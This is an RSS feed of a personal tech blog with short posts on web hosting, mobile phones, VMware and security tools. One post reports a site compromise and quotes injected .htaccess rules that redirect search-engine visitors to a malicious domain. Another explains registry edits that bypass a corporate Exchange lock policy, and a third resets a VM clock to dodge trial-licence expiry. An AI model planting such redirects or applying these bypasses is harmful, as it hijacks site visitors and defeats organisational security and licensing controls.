<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>the new cube 2.0 &#187; Technical</title>
	<atom:link href="http://jiehong.org/blog/category/technical/feed/" rel="self" type="application/rss+xml" />
	<link>http://jiehong.org/blog</link>
	<description>the new cube 2.0</description>
	<lastBuildDate>Sun, 01 Aug 2010 14:50:28 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Latest activity</title>
		<link>http://jiehong.org/blog/2009/07/26/latest-activity/</link>
		<comments>http://jiehong.org/blog/2009/07/26/latest-activity/#comments</comments>
		<pubDate>Sun, 26 Jul 2009 02:43:50 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[incident]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=273</guid>
		<description><![CDATA[It&#8217;s been a while since my last entry. A few things was happening, my blog engine went kaput a few weeks ago and it actually affected my Google ranking. I saw a significant drop search engine directed traffic. Recently I discovered some malicious activity on my other web host. I was going through my gallery, [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s been a while since my last entry. A few things was happening, my blog engine went kaput a few weeks ago and it actually affected my Google ranking. <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  I saw a significant drop search engine directed traffic.</p>
<p>Recently I discovered some malicious activity on my other web host. I was going through my gallery, http://jiehong.net/gallery when after a few clicks, I got re-directed to ask.com. I thought I haven&#8217;t renew my subscription or my domain hosting. </p>
<p>After checking my subscriptions, all is fine. I went into cPanel to poke around. What can cause re-directions, I check the re-directions settings, sub-domains etc. Finally I discover some re-directing codes in some of my .htaccess.</p>
<p>Sample:</p>
<blockquote><p>
ErrorDocument 400 http://ake.kz/in.cgi?8<br />
ErrorDocument 401 http://ake.kz/in.cgi?8<br />
ErrorDocument 403 http://ake.kz/in.cgi?8<br />
ErrorDocument 404 http://ake.kz/in.cgi?8<br />
ErrorDocument 500 http://ake.kz/in.cgi?8</p>
<p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*excite.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*goto.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*search.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*bing.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*dogpile.*<br />
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]
</p></blockquote>
<p>I discovered a folder was created in my public_html, &#8220;coming10/almost&#8221;. What&#8217;s almost, the hacking is almost done ?<br />
I found the following files inside<br />
 &#8211; .htaccess<br />
 &#8211; doing83.html<br />
 &#8211; er404.php<br />
 &#8211; everyting40php<br />
 &#8211; thanks28.html</p>
<p>They all contain encoded javascript to redirect visitors to some site. MY VISITORS ! I reported to my web host, I wonder how much action can they take. They are using ClamAV to scan the /home. Oh well&#8230; I&#8217;m expecting somebody eye-balling the logs to determine the source of entry.</p>
<p>Now I still do not know how they got in, so I need to monitor my site very closely.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2009/07/26/latest-activity/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to use PHP5 if CPanel is configured for PHP4 by default</title>
		<link>http://jiehong.org/blog/2008/11/02/how-to-use-php5-if-cpanel-is-configured-for-php4-by-default/</link>
		<comments>http://jiehong.org/blog/2008/11/02/how-to-use-php5-if-cpanel-is-configured-for-php4-by-default/#comments</comments>
		<pubDate>Sun, 02 Nov 2008 15:50:52 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Technical]]></category>
		<category><![CDATA[cpanel]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[web hosting]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=262</guid>
		<description><![CDATA[The older version of CPanel version 10 does not have the option for changing to PHP5. So what you need to do is to add the following line to your .htaccess file. &#8220;AddType application/x-httpd-php5 .php&#8221;]]></description>
			<content:encoded><![CDATA[<p>The older version of CPanel version 10 does not have the option for changing to PHP5. So what you need to do is to add the following line to your .htaccess file.</p>
<p>&#8220;AddType application/x-httpd-php5 .php&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/11/02/how-to-use-php5-if-cpanel-is-configured-for-php4-by-default/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cold Boot Attacks on Encryption Keys</title>
		<link>http://jiehong.org/blog/2008/10/19/cold-boot-attacks-on-encryption-keys/</link>
		<comments>http://jiehong.org/blog/2008/10/19/cold-boot-attacks-on-encryption-keys/#comments</comments>
		<pubDate>Sat, 18 Oct 2008 17:47:17 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Systems]]></category>
		<category><![CDATA[encryption]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=238</guid>
		<description><![CDATA[I just read this article on using compressed air to cool a memory chip so it will retain data even power is been cut off. A video can be found here on the process and on why colder memory chip will retain data longer. By retaining the data, you can do a dump of the [...]]]></description>
			<content:encoded><![CDATA[<p>I just read this <a href="http://hacknmod.com/hack/hack-encryption-keys-using-compressed-air/" target="_blank">article</a> on using compressed air to cool a memory chip so it will retain data even power is been cut off.</p>
<p>A video can be found <a href="http://citp.princeton.edu/memory/" target="_blank">here</a> on the process and on why colder memory chip will retain data longer. By retaining the data, you can do a dump of the data and extract the cryptographic keys. They were able to extract keys for BitLocker, TrueCrypt, FileVault and dm-crypt.</p>
<p>The attack is not exploiting weakness of the encryption software but due to the fact that the keys have to be stored in memory.  Encrypting the key in memory don&#8217;t really help, you still need to store that key that encrypts somewhere !</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/10/19/cold-boot-attacks-on-encryption-keys/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Modifying Microsoft Exchange Security Policy on Windows Mobile</title>
		<link>http://jiehong.org/blog/2008/10/05/modifying-microsoft-exchange-security-policy-on-windows-mobile/</link>
		<comments>http://jiehong.org/blog/2008/10/05/modifying-microsoft-exchange-security-policy-on-windows-mobile/#comments</comments>
		<pubDate>Sat, 04 Oct 2008 18:50:08 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Mobiles]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[HTC]]></category>
		<category><![CDATA[Microsoft Exchange]]></category>
		<category><![CDATA[registry]]></category>
		<category><![CDATA[Touch Pro]]></category>
		<category><![CDATA[tweak]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=190</guid>
		<description><![CDATA[My story on why I decided to change the phone lock timeout. When I first power on my HTC Touch Pro, I went through the start up wizard, it prompt me to set a phone lock pin and a timeout for activating the lock. I decided to go with 15mins, since I can change it [...]]]></description>
			<content:encoded><![CDATA[<p>My story on why I decided to change the phone lock timeout.</p>
<p>When I first power on my HTC Touch Pro, I went through the start up wizard, it prompt me to set a phone lock pin and a timeout for activating the lock. I decided to go with 15mins, since I can change it later.</p>
<p>I decided to configure an Exchange profile on my Touch Pro for my office emails, since I have a Mobile Broadband plan with a 50GB data limit.</p>
<p><span id="more-190"></span></p>
<p>After the first day, I got pretty pissed off by the 15mins timeout. I tried changing it but it didn&#8217;t allow me to do that. I checked around and realise it&#8217;s actually a security policy which is pushed down by my corporate Exchange Server.</p>
<p>Firstly the 15mins timeout is too short, you don&#8217;t look at your phone every 10mins to see if you have any new SMS, missed calls or emails. So everytime when I wanted to make a call, reply a SMS, I have to enter my pin to unlock it.</p>
<p>Yes, I believe we should have security controls in place, it&#8217;s always a balance of Security and Usability. I am a working in the IT Security line <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  , but it&#8217;s too frustrating.</p>
<p>I searched around and I found this workaround. I very surprised the hack published in a <a href="http://blogs.microsoft.co.il/blogs/tamir/archive/2007/12/28/how-to-disable-exchange-security-policy-for-windows-mobile-devices.aspx" target="_blank">Microsoft blog</a> ! Here&#8217;s the screen shot of the utility and you can download it <a href="http://http://blogs.microsoft.co.il/files/folders/tamir/entry46249.aspx" target="_blank">here</a>.</p>
<p><a href="http://blogs.microsoft.co.il/files/folders/tamir/entry46249.aspx"><img class="alignleft" title="Screenshot" src="http://blogs.microsoft.co.il/blogs/tamir/WindowsLiveWriter/HowtodisableExchangeSecurityPolicyforWin_1018F/image_53399df3-8816-48e3-a45b-4f19ce5afe63.png" alt="" width="170" height="209" /></a></p>
<p>Finally, I didn&#8217;t disable the phone lock feature, I left it enabled as I did in all my previous phones. I just change the timeout to a more reasonable duration.</p>
<p>As you can see, you can disable the phone lock or modify the timeout duration. It actually modifies the value of several registry keys.</p>
<ul>
<li>Enable/Disable the Exchange security policy &#8211; HKLM\Security\Policies\00001023: 0 = Enabled; 1 = Disabled</li>
<li>Inactivity time
<ul>
<li>HKLM\Comm\Security\Policy\LASSD\AE\{50C13377-C66D-400C-889E-C316FC4AB374}\AEFrequencyType: 0 = No inactivity time; 1 = Activity time enable</li>
<li>HKLM\Comm\Security\Policy\LASSD\AE\{50C13377-C66D-400C-889E-C316FC4AB374}\AEFrequencyValue: number of minutes before timeout</li>
</ul>
</li>
</ul>
<p>Remember, the security policy is there for a reason. You won&#8217;t want your phone to be picked up by somebody with malicous intent.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/10/05/modifying-microsoft-exchange-security-policy-on-windows-mobile/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Check Point VPN-1 Support for iPhone</title>
		<link>http://jiehong.org/blog/2008/09/30/check-point-vpn-1-support-for-iphone/</link>
		<comments>http://jiehong.org/blog/2008/09/30/check-point-vpn-1-support-for-iphone/#comments</comments>
		<pubDate>Tue, 30 Sep 2008 04:58:33 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Mobiles]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[Check Point]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[ipsec]]></category>
		<category><![CDATA[vpn]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=186</guid>
		<description><![CDATA[Now, this is interesting for you iPhone folks. Check Point is providing IPsec VPN client for iPhone. Link]]></description>
			<content:encoded><![CDATA[<p>Now, this is interesting for you iPhone folks. Check Point is providing IPsec VPN client for iPhone.</p>
<p><a href="http://www.checkpoint.com/press/2008/iphone060208.html" target="_blank">Link</a></p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/09/30/check-point-vpn-1-support-for-iphone/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Need a map ?</title>
		<link>http://jiehong.org/blog/2008/04/30/need-a-map/</link>
		<comments>http://jiehong.org/blog/2008/04/30/need-a-map/#comments</comments>
		<pubDate>Tue, 29 Apr 2008 17:14:54 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Mobiles]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[map]]></category>
		<category><![CDATA[mgmaps]]></category>
		<category><![CDATA[p1i]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=93</guid>
		<description><![CDATA[Well, most Singaporeans are pretty crippled recently due to a law suit between Singapore Land Authority and Virtual Maps, thus the mapping service from www.streetdirectory.com is not available currently. So when I was at Auckland for a firewall deployment, the customer was showing his Blackberry with an mapping application, Mgmaps or Mobile Gmaps. He&#8217;s using [...]]]></description>
			<content:encoded><![CDATA[<p>Well, most Singaporeans are pretty crippled recently due to a law suit between Singapore Land Authority and Virtual Maps, thus the mapping service from <a href="http://www.streetdirectory.com" target="_blank">www.streetdirectory.com</a> is not available currently.</p>
<p>So when I was at Auckland for a firewall deployment, the customer was showing his Blackberry with an mapping application, <a href="http://www.mgmaps.com/" target="_blank">Mgmaps or Mobile Gmaps</a>. He&#8217;s using it with a built-in GPS and the best part is, the maps are stored in his memory card. Offline browsing !</p>
<p><span id="more-93"></span></p>
<p>It&#8217;s like an improved version of Google Maps for Mobile and the best feature which I love, offline cached mode ! I can leech the 17 zoom levels of Singapore from Google map and stored in my memory card. So now I have the street map of Singapore in my Sony Ericsson P1i.</p>
<p>Here&#8217;s a <a href="http://forum.mgmaps.com/viewtopic.php?t=670" target="_blank">link to a very good tutorial</a> to start using Mobile Gmaps.</p>
<p>To summarise the tutorial in my terms,</p>
<ol>
<li>Go to <a href="http://www.mapcacher.com/" target="_blank">http://www.mapcacher.com/</a> to mark out the areas you will like and generate a .map file</li>
<li>Use gMapMaker to &#8220;leech&#8221; the maps from Google</li>
<li>Install Mobile Gmaps into your mobile via <a href="http://wap.mgmaps.com" target="_blank">http://wap.mgmaps.com</a></li>
<li>Load the &#8220;leeched&#8221; files into your memory card (warning: long transfer speeds, use a card reader if possible)</li>
<li>Launch Mobile Gmaps and configured the cache directory to the location where you copied your &#8220;leech&#8221; maps</li>
<li>Viola, Google map offline !</li>
</ol>
<p>Of course, if you have an unlimited HSDPA plan, you can enjoy the online features which I haven&#8217;t tried <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/04/30/need-a-map/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Fring + Pfingo = Pfringo ?</title>
		<link>http://jiehong.org/blog/2008/04/16/fring-pfingo-pfringo/</link>
		<comments>http://jiehong.org/blog/2008/04/16/fring-pfingo-pfringo/#comments</comments>
		<pubDate>Tue, 15 Apr 2008 16:25:49 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Mobiles]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[fring]]></category>
		<category><![CDATA[pfingo]]></category>
		<category><![CDATA[pfringo]]></category>
		<category><![CDATA[sip]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=92</guid>
		<description><![CDATA[Right, I&#8217;m slow with this SIP VOIP stuff.  When I subscribed to Pfingo SIP service, I was searching high and low for the client for UIQ3, since Sony Ericsson P1 is supported. Guess what ? From the instructions, I have to contact Sony Ericsson to install the internet telephony software. If I were to update [...]]]></description>
			<content:encoded><![CDATA[<p>Right, I&#8217;m slow with this SIP VOIP stuff.  When I subscribed to <a href="http://www.pfingo.com/" target="_blank">Pfingo</a> SIP service, I was searching high and low for the client for UIQ3, since Sony Ericsson P1 is supported.</p>
<p><span id="more-92"></span></p>
<p>Guess what ? From the <a href="http://www.pfingo.biz/pfingo/p1i.htm" target="_blank">instructions</a>, I have to contact Sony Ericsson to install the internet telephony software. If I were to update my P1 firmware, it will be a clean install.</p>
<p>My colleague who introduced Pfingo to me, mentioned that somebody configured Fring to use Pfingo SIP server to make SIP calls.</p>
<p>Remember <a href="http://jiehong.org/blog/free-uiq-3-applications" target="_self">Fring</a> ? The multi-IM client for UIQ3 ? <a href="http://jiehong.org/blog/free-uiq-3-applications" target="_self"></a></p>
<p>So here&#8217;s how we configure Fring.</p>
<p>Start Fring, Manage Communities, Select SIP and enter the information below.</p>
<p>User ID: your pfingoTALK number<br />
Password: your pfingoTALK password (different from your pfingo login)<br />
SIP Server List: others<br />
SIP Account: <a href="http://sip.pfingo.com/" target="_blank">sip.pfingo.com</a></p>
<p>Chat away !!</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/04/16/fring-pfingo-pfringo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Great VMware resource on tweaking your .vmx</title>
		<link>http://jiehong.org/blog/2008/03/20/great-vmware-resource-on-tweaking-your-vmx-file/</link>
		<comments>http://jiehong.org/blog/2008/03/20/great-vmware-resource-on-tweaking-your-vmx-file/#comments</comments>
		<pubDate>Wed, 19 Mar 2008 16:18:02 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Systems]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[tweak]]></category>
		<category><![CDATA[vmware]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2008/03/20/great-vmware-resource-on-tweaking-your-vmx-file/</guid>
		<description><![CDATA[I was looking for a way to force my VM to boot up with a specific date and time without going into the VM BIOS to change it every time I boot up. I just need a VM for testing and evaluating certain software or platforms but I don&#8217;t like re-building it when the licenses [...]]]></description>
			<content:encoded><![CDATA[<p>I was looking for a way to force my VM to boot up with a specific date and time without going into the VM BIOS to change it every time I boot up.</p>
<p>I  just need a VM for testing and evaluating certain software or platforms but I don&#8217;t like re-building it when the licenses expires.</p>
<p>Especially when trial software always expires in like 15 or 30 days ? 7 for a particular secure os and 15 for a particular secure platform. <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><span id="more-88"></span></p>
<p>Here&#8217;s what I <a href="http://sanbarrow.com/vmx/vmx-always-start-tonight.html" target="_blank">found</a> @ <a href="http://sanbarrow.com/" target="_blank">http://sanbarrow.com/</a>.</p>
<p>I will need to add the following lines to my xxx.vmx, so everytime the VM boots up, it resets it&#8217;s date and time to my liking.</p>
<blockquote><p>rtc.startTime = 1089395200<br />
tools.syncTime = false<br />
time.synchronize.continue = false<br />
time.synchronize.restore = false<br />
time.synchronize.resume.disk = false<br />
time.synchronize.resume.memory = false<br />
time.synchronize.shrink = false</p></blockquote>
<p>Figuring the value for rtc clock ? A small application is available for download at the same site to calculate that value from dd/mm/yyyy hh:mm:ss.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/03/20/great-vmware-resource-on-tweaking-your-vmx-file/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>To backup a Non-Data DVD</title>
		<link>http://jiehong.org/blog/2008/01/08/to-backup-a-non-data-dvd/</link>
		<comments>http://jiehong.org/blog/2008/01/08/to-backup-a-non-data-dvd/#comments</comments>
		<pubDate>Tue, 08 Jan 2008 12:46:54 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[dvd]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2008/01/08/to-backup-a-non-data-dvd/</guid>
		<description><![CDATA[Well, if you have some DVDs that you will like to backup, here are the steps to do it. Note: For non-encrypted DVDs, meaning like personal home videos, non-commerical created DVDs, etc.. Step 1: dvdbackup -M -i /dev/dvd -o ./outputdir/ -M tells it to make a full backup, there are other parameters to backup selective [...]]]></description>
			<content:encoded><![CDATA[<p>Well, if you have some DVDs that you will like to backup, here are the steps to do it.</p>
<p>Note: For non-encrypted DVDs, meaning like personal home videos, non-commerical created DVDs, etc.. <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Step 1:</p>
<p>dvdbackup -M -i /dev/dvd -o ./outputdir/</p>
<p>-M tells it to make a full backup, there are other parameters to backup selective chapters.</p>
<p>dvdbackup will create the DVD folder structure under ./outputdir/&lt;volume-name&gt;</p>
<p>Step 2:</p>
<p>mkisofs -dvd-video -o dvd.iso ./outputdir/&lt;volume-name&gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/01/08/to-backup-a-non-data-dvd/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Quick way to upgrade aircrack-ng in BackTrack</title>
		<link>http://jiehong.org/blog/2008/01/03/a-very-quick-way-to-upgrade-aircrack-ng-in-back-track-2/</link>
		<comments>http://jiehong.org/blog/2008/01/03/a-very-quick-way-to-upgrade-aircrack-ng-in-back-track-2/#comments</comments>
		<pubDate>Wed, 02 Jan 2008 17:12:16 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[aircrack]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2008/01/03/a-very-quick-way-to-upgrade-aircrack-ng-in-back-track-2/</guid>
		<description><![CDATA[If you installed Back Track 2 into your hdd and if you want to update the aircrack-ng suite, here&#8217;s the commands to do so. Download the source here. tar -zxvf aircrack-ng-0.9.1.tar.gz cd aircrack-ng-0.9.1 make make -B install make install will throw out some errors, so just do it with a &#8220;-B&#8221; -B, &#8211;always-make Unconditionally make [...]]]></description>
			<content:encoded><![CDATA[<p>If you installed Back Track 2 into your hdd and if you want to update the aircrack-ng suite, here&#8217;s the commands to do so.</p>
<p><span id="more-86"></span><br />
Download the source <a href="http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz" target="_blank">here</a>.</p>
<p>tar -zxvf aircrack-ng-0.9.1.tar.gz<br />
cd aircrack-ng-0.9.1<br />
make<br />
make -B install</p>
<p>make install will throw out some errors, so just do it with a &#8220;-B&#8221;</p>
<p>-B, &#8211;always-make            Unconditionally make all targets.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/01/03/a-very-quick-way-to-upgrade-aircrack-ng-in-back-track-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
